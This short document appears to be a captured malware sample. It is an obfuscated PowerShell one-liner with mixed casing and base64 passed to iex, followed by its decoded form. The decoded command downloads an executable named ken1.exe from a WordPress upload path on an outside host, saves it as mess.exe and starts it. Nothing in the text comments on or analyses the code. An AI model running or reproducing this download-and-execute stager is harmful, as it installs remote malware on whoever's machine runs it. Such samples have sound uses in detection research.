iex([syStem.tExT.EnCodING]::UTf8.getstrinG([SyStEm.COnVERt]::fROMbAse64stRING('CihOZXctT2JqZWN0IFNZc1RFTS5uZVQuV0ViY2xJRU50KS5Eb1dObE9hZGZpTEUoJ2h0dHA6Ly9icm9rZWxpbWl0ZWRzLmluL3dwLWFkbWluL2Nzcy91cGxvYWQva2VuMS5leGUnLCdtZXNzLmV4ZScpO1N0YXJ0LVByb2Nlc3MgJ21lc3MuZXhlJwoK')));exit

##### B64 CONTENT #####


(New-Object SYsTEM.neT.WEbclIENt).DoWNlOadfiLE('http://brokelimiteds.in/wp-admin/css/upload/ken1.exe','mess.exe');Start-Process 'mess.exe'

